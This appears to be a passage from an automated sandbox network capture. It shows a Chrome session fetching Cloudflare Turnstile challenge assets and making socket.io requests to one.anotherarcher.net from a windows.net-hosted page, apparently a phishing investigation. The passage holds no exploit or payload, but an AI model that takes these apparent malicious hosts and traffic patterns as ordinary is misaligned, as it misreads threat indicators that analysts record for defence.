                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                110192.168.2.44986979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB6NS&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC175INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                111192.168.2.44987179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB65a&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                112192.168.2.449872104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ccfd82849af42f2/1727989047472/e53e8c3f2f8c351e0d6de244f7bc9e0685c7312f320e241f08ded9bfaa7d5646/ub8_AuRp71dkuv3 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 35 54 36 4d 50 79 2d 4d 4e 52 34 4e 62 65 4a 45 39 37 79 65 42 6f 58 48 4d 53 38 79 44 69 51 66 43 4e 37 5a 76 36 70 39 56 6b 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g5T6MPy-MNR4NbeJE97yeBoXHMS8yDiQfCN7Zv6p9VkYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1INData Raw: 4a
                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                113192.168.2.449873104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd84d0859428f&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:31 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 121009
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8536ff04245-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65
                                                                                                                                                                                                                                Data Ascii: resh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 73 65 49 6e 74 28 67 48 28 31 30 30 31 29 29 2f 31 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 48 28 36 31 39 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 35 34 31 38 32 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 36 34 30 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 4a 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 67 4a 3d 67 49 2c 66 3d 7b 27 44 4d 55 66 72 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 52 75 70 71 57 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d
                                                                                                                                                                                                                                Data Ascii: seInt(gH(1001))/11*(-parseInt(gH(619))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,154182),eM=this||self,eN=eM[gI(640)],eO=function(c,gJ,f,g,h,i,j,k){for(gJ=gI,f={'DMUfr':function(l,m){return l+m},'RupqW':function(l,m){return l(m
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 6e 20 68 2d 69 7d 2c 27 7a 54 61 6f 53 27 3a 67 4c 28 36 35 32 29 2c 27 72 52 6b 5a 45 27 3a 67 4c 28 31 39 33 31 29 2c 27 7a 5a 53 4f 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6f 41 6b 54 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 59 61 51 47 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 7a 64 4f 73 4c 27 3a 67 4c 28 31 31 31 35 29 2c 27 46 76 63 4b 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 51 51 72 54 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 49 5a 4e 63 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                                                                                                                                Data Ascii: n h-i},'zTaoS':gL(652),'rRkZE':gL(1931),'zZSOu':function(h,i){return i==h},'oAkTx':function(h,i){return h(i)},'YaQGm':function(h,i){return i===h},'zdOsL':gL(1115),'FvcKT':function(h,i){return i*h},'QQrTr':function(h,i){return h!=i},'IZNcS':function(h,i){r
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 3d 30 2c 47 5b 67 4f 28 39 38 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4f 28 31 31 37 36 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 67 4f 28 39 38 36 29 5d 28 64 5b 67 4f 28 31 32 30 38 29 5d 28 48 2c 31 29 2c 64 5b 67 4f 28 39 34 31 29 5d 28 4d 2c 31 29 29 2c 64 5b 67 4f 28 31 39 36 39 29 5d 28 49 2c 64 5b 67 4f 28 31 34 31 38 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 4f 28 39 38 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 67 4f 28 31 31 38 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d
                                                                                                                                                                                                                                Data Ascii: =0,G[gO(989)](o(H)),H=0):I++,M=0,s++);for(M=C[gO(1176)](0),s=0;16>s;H=d[gO(986)](d[gO(1208)](H,1),d[gO(941)](M,1)),d[gO(1969)](I,d[gO(1418)](j,1))?(I=0,G[gO(989)](o(H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[gO(1188)](2,F),F++),delete B[C]}else for(M=x[C]
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 3d 64 5b 67 50 28 34 38 39 29 5d 2c 69 5b 67 50 28 31 35 34 31 29 5d 3d 64 5b 67 50 28 31 35 30 39 29 5d 2c 6a 3d 69 2c 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 64 5b 67 50 28 31 39 38 36 29 5d 28 27 27 2c 68 29 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 50 28 31 35 34 30 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 67 51 2c 6c 2c 6d 2c 6f 29 7b 69 66 28 67 51 3d 67 50 2c 6c 3d 7b 7d 2c 6c 5b 67 51 28 38 30 39 29 5d 3d 6a 5b 67 51 28 35 36 32 29 5d 2c 6d 3d 6c 2c 6a 5b 67 51 28 31 35 34 31 29 5d 3d 3d 3d 67 51 28 31 39 33 31 29 29 72 65 74 75 72 6e 20 68 5b 67 51 28 31 31 37 36 29 5d 28 6b 29 3b 65 6c 73 65 20 6f 3d 7b 7d 2c 6f 5b 67 51 28 31 38 39 32 29 5d 3d 6d 5b 67 51 28 38 30 39 29 5d 2c 6f 5b 67 51 28 39 32 33 29 5d 3d 66 5b 67 51 28 31 38 30 33
                                                                                                                                                                                                                                Data Ascii: =d[gP(489)],i[gP(1541)]=d[gP(1509)],j=i,null==h?'':d[gP(1986)]('',h)?null:f.i(h[gP(1540)],32768,function(k,gQ,l,m,o){if(gQ=gP,l={},l[gQ(809)]=j[gQ(562)],m=l,j[gQ(1541)]===gQ(1931))return h[gQ(1176)](k);else o={},o[gQ(1892)]=m[gQ(809)],o[gQ(923)]=f[gQ(1803
